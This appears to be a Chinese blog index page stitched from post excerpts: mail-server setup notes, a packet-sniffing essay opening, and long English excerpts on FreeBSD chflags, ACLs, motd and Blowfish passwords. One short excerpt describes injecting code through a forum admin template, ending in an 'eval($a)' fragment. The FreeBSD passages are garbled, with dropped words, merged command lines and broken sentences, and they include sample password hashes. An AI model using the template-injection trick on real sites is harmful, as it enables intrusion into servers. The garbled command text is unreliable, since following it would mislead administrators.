飘零的代码 piao2010 ’s blog

转载请保留版权：http://piao2010.com 谢谢！
最近在公司实习，第一个任务就是配置一个企业内部的邮件服务系统，要求同时支持WEB方式和smtp pop3 imap收发邮件。
经过一番Google对主流软件进行筛选之后我决定采用的软件如下：
POSTFIX Courier-imap,Courier-authlib,Cyrus SASL,Maildrop
webmail采用extmail 后台extman
垃圾邮件过滤和病毒防护采用Amavisd-new, ClamAV,spamassassin,slockd
因为之前没接触过邮件服务配置，而且对Linux也不算太熟悉，一直用的是FreeBSD,所以这个任务整整花了10天多的时间终于在三台虚拟机上安装测试成功并最终在服务器上实现，我测试的是CentOS和Fedora 系统，重要软件采用源码方式安装，基本上可以适用于其它平台。

测试地址：http://mail.piao2010.com 欢迎大家测试！

参考文章
http://waringid.blog.51cto.com/65148/58412
http://www.extmail.org/docs/extmail_solution_linux/
http://os.51cto.com/art/200710/57530_1.htm
http://www.postfix.org/SASL_README.html
《POSTFIX权威指南》等等
感谢以上作者的辛勤劳动

 
***************************************************

一切重新开始：(2009-7-18)

***************************************************

yum install ntp
ntpdate 210.72.145.44 && clock -w#无关操作，因为虚拟机的时间总是不准，所以同步一下时间。

vi /etc/sysconfig/selinux
禁用selinux
如果不想禁用也可以用下面的命令
setsebool httpd_disable_trans=1
setsebool mysqld_disable_trans=1
iptables相关设置
允许 25 110 80 端口

设置hostname
/etc/sysconfig/network
/etc/hosts read more »

 

此文是我的计算机网络课作业，拿出来凑凑数。

第一次接触“抓包”这个词应该是在高一的时候，当时刚刚迷上网络安全，经常从《黑客X档案》中看见一些利用抓包技术入侵的文章，最常用的工具就是WsockExpert， read more »

方式1 模板法

进入后台， 风格模版设置 ，在随便一行写代码

记住，这代码必须顶着左边行写，代码前面不可以有任何字符。

EOT;

eval($a);

print <<

read more »

When Figure 6-1 summarizes the flags, their meanings, and their usual usage.[Hack #58] shows how to create your own file integrity checking program that will alert you if any of your binaries or other important files are changed. An additional layer of protection is to use chflags to prevent those files from being changed in the first place. Usually, the schg

• /usr/bin, which contains user programs

• /usr/sbin, which contains system programs

• /etc, which contains system configurations

Again, evaluate your particular scenario before implementing this flag. The protection provided by this flag usually far outweighs the inconvenience. The only time the contents of /usr/bin or /usr/sbin should change is when you upgrade the operating system or rebuild your world. Doing that requires a reboot anyway, so dropping to single-user mode to unset schg shouldn’t be a problem.

How often do you change your configuration files in /etc? If you typically configure a system only when it is installed and rarely make changes afterward, protect your configurations with schg. However, keep in mind that a rare configuration change may require you to drop all connections in order to implement it. Also, if you need to add more users to your system, remember to remove that flag from /etc/passwd, /etc/master.passwd, and /etc/group first.

Things are a bit more problematic for a system running installed applications. Most ports install their binaries into /usr/local/bin or /usr/X11R6/bin. If you set the schg flag on those directories, you won’t be able to patch or upgrade those binaries unless you temporarily unset the flag. You’ll have to balance your need to keep your server up and running with the protection you gain from the schg flag and how often you have to patch a particular binary.

6.4.6 Controlling Backups

The last two arch and nodump, affect backups. The arch flag.

Similarly, when using dump to back up an entire filesystem, the superuser can specify which portions of that filesystem will not be included by setting the nodump flag.

6.4.7 See Also

• man securelevel

• man -a chflags (to view all manpages that match chflags, not just the

• man newsyslog

ACLs

Edit the superblock with the

# shutdown now*** FINAL System shutdown message from root@mycompany.com ***System going down IMMEDIATELYDec 11 10:28:07 genisis shutdown: shutdown by root:System shutdown time has arrivedWriting entropy file:.Shutting down daemon processes:.Saving firewall state tables:.Dec 11 10:28:10 genisis syslogd: exiting on signal 15Enter full pathname of shell or RETURN for /bin/sh:#

At the prompt, type:

# /sbin/tunefs -a enable /# /sbin/tunefs -a enable /usr# exit

Things [Hack #54] . Don’t reboot yet; you still need to initialize the extended attributes on each file system.

For example, to initialize extended attributes on the /var filesystem, use

# mkdir -p /var/.attribute/system# cd /var/.attribute/system# extattrctl initattr -p /var 388 posix1e.acl_access# extattrctl initattr -p /var 388 posix1e.acl_default

Okay, you’ve successfully enabled ACLs. Now what? Let’s start by viewing ACLs. Looking at ACLs is simple. Files with ACLs will be designated with a + in the long listing provided by ls -l:

% ls -l acl-test-rw-rw-r–+ 1 rob rob 0 Apr 19 17:27 acl-test

Use the

% getfacl acl-test#file:acl-test#owner:1000#group:1000user::rw-user:nobody:rw-group::r–group:wheel:rw-mask::rw-other::r–

The user::, group::, and other:: fields should all be familiar. They are simply the ACL representations of the standard Unix nobody and wheel lines, however, are new. These specify permissions for specific users and groups (in this case, the nobody user and the wheel group) in addition to the normal set of permissions.

The mask field sets maximum permissions, so an r– mask (set with m::r) in combination with an rw- permission for a user will give the user only r– permissions on the file.

 

The chmod, only the file’s owner or the superuser can use this command. You only need to use a few of its options to start manipulating ACLs.

First, a word on syntax. ACLs are specified just as they’re printed by getfacl. Let’s remove and reconstruct the ACL for acl-test:

% setfacl -b acl-test% setfacl -m user:nobody:rw-,group:wheel:rw- acl-test

The -b option removes all ACLs, except for the standard user, group, and other lines. The -m option modifies the ACL with the specified entry (or comma-separated entries). Entries may also be abbreviated: the code here could have been shortened to u:nobody:rw-,g:wheel:rw-.

You can even use setfacl to modify traditional permissions; setting a user::rw- ACL entry is equivalent to running chmod u=rw on a file.

Removing ACLs is almost identical: setfacl -x u:nobody:rw-,g:wheel:rw- removes that ACL. You can also specify ACLs in files. The -M and -X options perform the functions of their lowercase relatives, but read their entries from a file. Consider the acl-test file again:

% cat test-acl-listu:nobody:rw-# this is a commentg:wheel:rw-% setfacl -X test-acl-list acl-test% getfacl acl-test#file:acl-test#owner:1000#group:1000user::rw-group::r–mask::r–other::r–

网上没下载到中文版的，所以只能拿英文版的做一下摘记吧。

 

Let’s start with the copyright information. That’s this part of the default login process:

Copyright (c) 1992-2003 The FreeBSD Project.

Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994

The Regents of the University of California. All rights reserved.

To prevent users from seeing this information, simply:

# touch /etc/COPYRIGHT

Technically, you could add your own information to /etc/COPYRIGHT instead of leaving it as an

empty file. However, it is common practice to put your information in /etc/motd instead. The

default /etc/motd contains very useful information to the new user, but it does get rather old

after a few hundred logins.

You can edit /etc/motd to say whatever suits your purposes—anything from your favorite sci-fi

excerpt to all the nasty things that will happen to someone if they continue to try to log into

your system. Here’s a very simple example:

# more /etc/motd

*********************************************************

*****            Authorized users only!!            *****

*********************************************************

You’ll note that after you customize your motd, users will still see this text prepended to it:

FreeBSD 5.1-RELEASE (GENERIC) #0: Thu Jun 5 02:55:42 GMT 2003

If you don’t want to advertise your operating system version and kernel information, you’ll need

one more hack. Add this line to /etc/rc.conf:

update_motd=”NO”

If you’re using FreeBSD 5.x, you no longer have to reboot or go into single-user mode to

initialize a change to /etc/rc.conf. Instead, you can use one of the many scripts available in

/etc/rc.d. Let’s see if there’s a script that deals with motd:

# ls -F /etc/rc.d | grep motd

motd*

Excellent. Let’s see what syntax that command expects:

# /etc/rc.d/motd

Usage: /etc/rc.d/motd [fast|force](start|stop|restart|rcvar)

Parameters in square brackets are optional, whereas parameters in parentheses are mandatory.

Notice each option is separated by the or symbol (|), meaning you just pick one out of the list.

In our case, we want to use the rcvar parameter. This will tell the motd script to reread its

setting in /etc/rc.conf:

# /etc/rc.d/motd rcvar

# motd

$update_motd=NO

To use Blowfish, start by opening up /etc/login.conf in your favorite editor. Look for this line:

:passwd_format=md5:\

Carefully edit it so it looks like this:

:passwd_format=blf:\

Check for typos before saving your change.

You may have noticed this comment when you modified /etc/login.conf:

# Remember to rebuild the database after each change to this file:

#

#        cap_mkdb /etc/login.conf

#

Let’s take a closer look at what we’re being asked to do. According to that comment, login.conf

is more than a configuration file, it is a database. Not only that, it is a capability database,

a database that supports different capabilities. That is the reason behind the weird syntax

within login.conf. Whenever you edit a capability database, you have to use the cap_mkdb command

to integrate your changes within the database.

So, follow the directions:

# cap_mkdb /etc/login.conf
If you have any existing users, you need to convert their passwords from MD5 to Blowfish. This is

why it’s a good idea to make the change before you create your users.

If you’ve already created users, it’s back to the password database to find all of the active

accounts. Inactive accounts—accounts that don’t allow logins—have the * character instead of an

encrypted password. Since we want to find all of the lines in the password database that do not

contain an asterisk, we need an inverted grep:

# grep -v ‘*’ /etc/master.passwd

root:$1$ywXbyPT/$GC8tXN91c.lsKRpLZori61:0:0::0:0:Charlie &:/root:/bin/csh

dru:$1$GFm1nh6I$jh3v4I.QNf450ARgltZU5.:1008:0::0:0:User &:/home/dru:/bin/csh

Well, that worked, but we could make the output look much prettier:

# grep -v ‘*’ /etc/master.passwd | cut -d ‘:’ -f 1

root

dru

Let’s pick apart that command syntax. grep -v creates a reverse filter. In effect, it says, “Show

me the lines in /etc/master.passwd that do not contain an *.” Since those lines are long and

contain much more than just the username, I piped the output to the cut utility to literally cut

out the portions I don’t need to see. Notice that the usernames are the very first thing in each

line, and they are always followed by the : field separator. -d tells cut to consider the colon

character, not the tab character, as the separator. -f 1 tells cut that I’m interested in the

very first field of that line.

It looks like my particular system has two active accounts: root and dru. Notice in the original

output the long sequence of characters that starts with $1 and ends with :. No, my users’

passwords aren’t quite that complex. Rather, you’re seeing the password after it’s been encrypted

by the MD5 algorithm. That $1 means MD5. It’ll be $2 after we switch to Blowfish encryption. (Be

aware that you can’t edit the file directly; the entire password must be changed.)

I’ll now change those two passwords:

# passwd dru

Changing local password for dru

New Password:

Retype New Password:

 

# passwd

Changing local password for root

New Password:

Retype New Password:

Note that the superuser can change any user’s password by specifying the appropriate username. If

you don’t specify a name, you will instead change the root password.

When you’re finished, repeat the original grep -v command and double-check that all of the

encrypted passwords now start with $2.
Finally, configure the adduser utility to use Blowfish whenever you create a new user by editing

/etc/auth.conf. Look for this line:

# crypt_default = md5 des

and carefully change it to:

crypt_default = blf

Once you’ve saved your change, test it by creating a new user. The easiest way to do this is to

type adduser and follow the prompts.